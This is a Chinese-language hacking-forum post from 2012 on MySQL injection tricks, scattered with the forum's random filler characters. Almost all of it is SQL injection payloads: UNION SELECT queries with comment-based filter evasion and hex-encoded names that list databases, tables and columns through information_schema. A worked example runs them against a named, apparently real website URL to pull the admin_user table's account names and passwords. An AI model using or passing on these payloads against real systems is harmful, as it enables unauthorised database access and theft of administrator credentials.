找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2088|回复: 0
打印 上一主题 下一主题

mysql注入技巧

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 16:29:37 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
查库
9 |) y( q: ]* P+ v5 Y
( ~& {; p& ~, Tid=-1 union select 1,..,SCHEMA_NAME,n  from/**/information_schema.SCHEMATA limit 1,1/*
* X5 @: @! G8 x/ H; w# W4 Z8 y1 [/ \' ]
查表# Y3 u8 q" W9 w+ F# {: o: z5 w
& Z' W* n$ J. J6 C. ]7 B  q
id=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=库的HEX值/**/limit/**/1,1
( c+ S7 I$ r& {6 l$ E. ?) \2 E4 ]" b
查段
' f2 a" R5 i$ M" ?, X
, l7 }/ b& w8 G. }7 E% ]id=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=表的HEX值/**/limit/**/1,1
( E% }. L% C( w  Z5 Y
4 c: C( w/ h0 l6 {  G" t& ~+ a5 ]4 y; f& V8 }  T& K
mysql5高级注入方法暴表2 M1 b  B3 i  W- Z# ?

1 N, B  W: X; P例子如下:
% B  s$ M7 ^  E  [
1 A& n$ w0 A* \% c5 B3 k& c2 z1.爆表
$ \! k2 g; r4 Hhttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*    (0x79645F7465616D6E6574为数据库名的16进制转换yd_teamnet)
  u7 Z. {) j" j5 n6 B0 c这样爆到第4个时出现了admin_user表。- {* @1 V5 m2 O! Y. X/ _9 t0 G3 i
: o8 l7 p% Z; i+ r8 ^+ z( U
2.暴字段0 ^! G$ K' p  b
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*( u; m2 j* `  p% ^; }) k6 f+ ~

% g2 N: S* P$ q+ Y8 K7 D  t$ O2 A) [8 S2 j% Z
3.爆密码
* z, _9 s  N4 uhttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/* ' V0 P+ c: D5 p, T% K6 F

6 o! r& o& A( K% \% p0 E4 g3 T7 F
$ \; p$ s4 H/ c6 S4 o2 E1 Q
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表